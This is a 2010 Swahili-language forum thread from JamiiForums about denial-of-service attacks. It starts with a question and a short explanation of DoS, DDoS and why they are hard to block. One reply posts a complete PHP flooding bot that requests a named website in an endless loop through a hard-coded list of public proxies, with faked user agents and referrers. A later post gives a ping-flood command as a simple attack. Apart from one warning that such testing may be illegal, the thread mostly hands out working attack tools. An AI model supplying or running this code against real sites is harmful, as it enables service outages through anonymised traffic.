Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

Tuelimishane :dos attack. Whathi is it and how can it be achieved?

Discussion in 'Tech, Gadgets & Science Forum' started by Mtazamaji, Dec 4, 2010.

  1. Mtazamaji

    Mtazamaji JF-Expert Member

    #1
    Dec 4, 2010
    Joined: Feb 29, 2008
    Messages: 5,972
    Likes Received: 27
    Trophy Points: 0
    wataalam
    napenda kujua kAm kuna mwenye detailed knowlnge ya Denial of service attack.

    Nimekuwwa nafutial website ya wiki leaks na naona wanalamika kuwa website yao imekuwa attacked kwa DDOS.(Ditributed Denial of Service)na hivyo kufanya watumiaji wa marekani na ulaya wasiipate .

    Though nime google na naendelea kudadisi naomba tuzidi kujadiliana nipate mwanga zaidi . For the sake of knowledge.

    • Nikitaka kufanya DOS nahitaji information gani, tools gani , codes gani
    • How do u attack a website with DOS?
    • Kuna njia yeyote website inaweza kujikinda na DOS?
    Nawasilisha kwa mjadala na kuelimishana
     
  2. Kang

    Kang JF-Expert Member

    #2
    Dec 4, 2010
    Joined: Jun 24, 2008
    Messages: 4,698
    Likes Received: 204
    Trophy Points: 160
    DOS atack ni kuitumia website requests mpaka zinazidi capacity yake zukabiliana na hizo request. DDOS ni DOS ina yotoaka sehemu tofauti at once, wanachofanya ni kuinfect compyuta za watu na Bots(Program) ambazo zinashambulia website, so inakuwa ngumu zaidi kublock coz bots zinaweza zikawa kila pande ya dunia na hazitoki source moja.

    Kwa mfano, nikiandaki program ambayo inafanya search kwenye Jamii forums mara elfu moja kwa sekunde, nitakuwa naperform DOS attack kwenye website hii, nikiandika Bot(Virus/program) ambayo nitaispread kisha zitashambulia Jamii forum zote kwa wakati mmoja hii ni DDOS.

    Kuna njia nyingi za kufanya DOS kutegemea na services za kwenye website. Hata kuiload website mara nyingi mfululizo inaweza ikawa DOS kwa sababu eventually hosting account itazidiwa capacity. Kuna zengine ziko more complicated amabazo zinaexploit algorithm au protocol fulani kwenye net.

    Kuzuia DOS ni ngumku hasa kama hauna resources za kutosha (bandwidth/processing power) basically inabidi ublock/drop requests zinazotoka kwa mshambuliaji, ila kuzidrop lazima zifike kwako kwanza na uziangalie ili ujue kuwa ni za mshambuliaji na sio za mtumiaji wa kawaida na hapo ndo resources zinapokuwa zinatumika i.e hauwezi ukablock kabla ya kuziangalia.
     
  3. Mtazamaji

    Mtazamaji JF-Expert Member

    #3
    Dec 4, 2010
    Joined: Feb 29, 2008
    Messages: 5,972
    Likes Received: 27
    Trophy Points: 0
    Thank you mkuu
    sasa ndo nilitka kujua mfano nina website mtazamaji.com. kama junior IT exper nataka kujua how can i perform DOS attck on my own website. Can u help me with more knowledge not as an end user.

    Maybe if i want to test if and how jamiiforum is vulnerable to DOS what do i need to do ?
     
  4. Kang

    Kang JF-Expert Member

    #4
    Dec 4, 2010
    Joined: Jun 24, 2008
    Messages: 4,698
    Likes Received: 204
    Trophy Points: 160
    Well sijawahi kutumia tools zozote za DOS. Lakini ni muhimu uje kuwa probably ni illegal kufanya hayo majaribio, hata kwenye website yako kama haufanyi hosting wewe mwenyewe, zaidi ya hapo webhost wako ataifunga website yako ikikumbwa na DOS attack kama una hosting plan za akawaida hizi "unlimited" for $5/month.
     
  5. Chamoto

    Chamoto JF-Expert Member

    #5
    Dec 4, 2010
    Joined: Dec 7, 2007
    Messages: 1,432
    Likes Received: 19
    Trophy Points: 135
    This simple bot can do a trick.
    ONYO Huu Ni Mfano Tuu Kwaajili Ya Kuelimishana - Sihusiki katika Matumizi Yeyote Mabaya Ha Hii Script

    Attacking Script
    PHP:

    set_time_limit
    (0);
    // include all functions

    $mimi_tazamaji "nataka kuipiga tovuti yangu";
     
    $mapigo 0;
     while (
    $mimi_tazamaji == "nataka kuipiga tovuti yangu") {
         
         
    //  Define variables
         
    $search_term get_search_term();
        
    $cookie_file_path "C:\".random_text().".txt";
        
    $target = "http://mtazamaji.com";
        
    $agent get_agent();
        
    $proxy get_proxy();
        
    $ref =   "http://www.google.com/#hl=en&q=".urlencode(trim($search_term))."&start=".rand(1,9)."0"."&sa=N&fp=".random_text().rand(100,30009);


          if (
    strpos ($target"jamiiforums.com") !==false ) { exit;}
              
    $mapigo ++;
              
    get_page($target$ref$agent"",$cookie_file_path$proxy);
          if (
    $mapigo == 10000000000000000) {exit;}
     
     }
    Function Get Search Term
    PHP:
    function get_search_term(){
          
    $my_array = array(
                    
               
    'acha tabia mbaya wewe',
               
    'sasa mambo gani haya mtazamaji',
               
    'siku nyingine nitakuchapa',
               
    'usirudie tena'

        
    $random array_rand($my_array);
        
    $search_term $my_array[$random];
      return  
    $search_term;
    Function Get Proxy
    Add more proxies (1mil) ideally unatakiwa uziweke kwenye database halafu una zicheki kabla ya kuzitumia kama ni mbovu unaziondoa kwenye database, lakini huu ni mfano tuu
    PHP:
    function get_proxy(){
          
    $my_array = array(
                    
               
    '109.239.191.157:8080',
               
    '110.136.178.214:3128',
               
    '112.223.156.219:3128',
               
    '113.254.178.220:8080',
               
    '119.191.59.71:8080',
               
    '119.4.77.122:9415',
               
    '119.80.97.149:9415',
               
    '12.198.207.32:8080',
               
    '120.88.10.172:808',
               
    '121.15.212.113:3128',
               
    '121.241.77.201:80',
               
    '123.135.192.26:80',
               
    '124.115.21.250:808',
               
    '124.124.105.138:80',
               
    '125.37.115.212:9415',
               
    '125.40.85.96:3128',
               
    '129.105.15.38:3128',
               
    '129.177.16.92:80',
               
    '130.192.157.132:3128',
               
    '131.247.2.247:3124',
               
    '143.215.131.206:3124',
               
    '163.43.161.134:80',
               
    '168.216.26.125:8888',
               
    '173.13.138.43:3128',
               
    '173.13.150.136:80',
               
    '173.14.5.140:80',
               
    '173.201.242.9:80',
               
    '173.203.109.119:80',
               
    '173.203.215.116:80',
               
    '217.29.30.20:8080',
               
    '217.77.209.30:3128',
               
    '218.204.29.110:808'

        
    $random array_rand($my_array);
        
    $proxy $my_array[$random];
      return 
    $proxy;
    }



    Function Random Text

    PHP:
    function random_text(){

        
    $text ="";
        for (
    $digit 0$digit 12$digit++){

           
    $r rand(0,1);
           
    $c = ($r==0)? rand(65,90) : rand(97,122);
           
    $text .= chr($c);

          }

        return 
    strtolower($text);
     }


    Function Get Page
    ( For requesting a page)
    PHP:
    function get_page($target$ref$agent,$post_data,$cookie_file_path$proxy){

         
    $ch curl_init();

         
    curl_setopt($chCURLOPT_URL$target);
         
    curl_setopt($chCURLOPT_HEADER,0); // No http header
         
    curl_setopt($chCURLOPT_REFERER$ref);
         
    curl_setopt($chCURLOPT_NOBODYFALSE);
         
    curl_setopt($chCURLOPT_RETURNTRANSFERTRUE);
         
    curl_setopt($chCURLOPT_COOKIEJAR$cookie_file_path);
         
    curl_setopt($chCURLOPT_COOKIEFILE$cookie_file_path);
         
    curl_setopt($chCURLOPT_USERAGENT$agent);
             
    curl_setopt($chCURLOPT_CONNECTTIMEOUT60);
             
    curl_setopt($chCURLOPT_TIMEOUT50);

         if(
    $proxy){
            
    curl_setopt($chCURLOPT_PROXY,$proxy);
         }
         if(
    $post_data){
            
    curl_setopt($chCURLOPT_POSTTRUE);
            
    curl_setopt($chCURLOPT_POSTFIELDS$post_data);
             }
         
    curl_setopt($chCURLOPT_FOLLOWLOCATIONTRUE);
         
    curl_setopt($chCURLOPT_MAXREDIRS4);

          if(
    preg_match("/\bhttps:/"$target)){
             
    curl_setopt($chCURLOPT_SSL_VERIFYPEER,0);
             
    curl_setopt($chCURLOPT_SSL_VERIFYHOST,0);
          }

            
    $page curl_exec($ch);
                    
    curl_close($ch);

            return  
    $page;

    }
    Function Get Agent (add more user agents)
    PHP:
    function get_agent(){
          
    $my_array = array(
              
    "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
              
    "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC) ",
              
    "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; AtHome0107)",
              
    "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)",
              
    "Mozilla/4.0 (compatible; MSIE 5.5; MSN 2.5; Windows 98; HomePage)",
              
    "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
              
    "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705)",
              
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; M-Web Indonesia)",
              
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
              
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705) ",
                     );

        
    $random array_rand($my_array);
        
    $agent $my_array[$random];
      return 
    $agent;
    }
     
  6. Mtazamaji

    Mtazamaji JF-Expert Member

    #6
    Dec 4, 2010
    Joined: Feb 29, 2008
    Messages: 5,972
    Likes Received: 27
    Trophy Points: 0
    Pia ping commmand inaweza kutumika kama Dos attack kwenye some simple/small website

    Mfano kwenye command prompt ukitype
    ping 192.168.1.1 - t - l 65500

    wataalam wanasema watu wawili au wattu wakirun hiyo command kwa pamoja kwa one hour then ile ip adress ( website) itakuwa down.

    NB:
    kama website haina mechanism ya kublock ping flood packets. inaweza kuwa attacked na very simple technique
     
    Last edited by a moderator: Jan 4, 2016
Loading...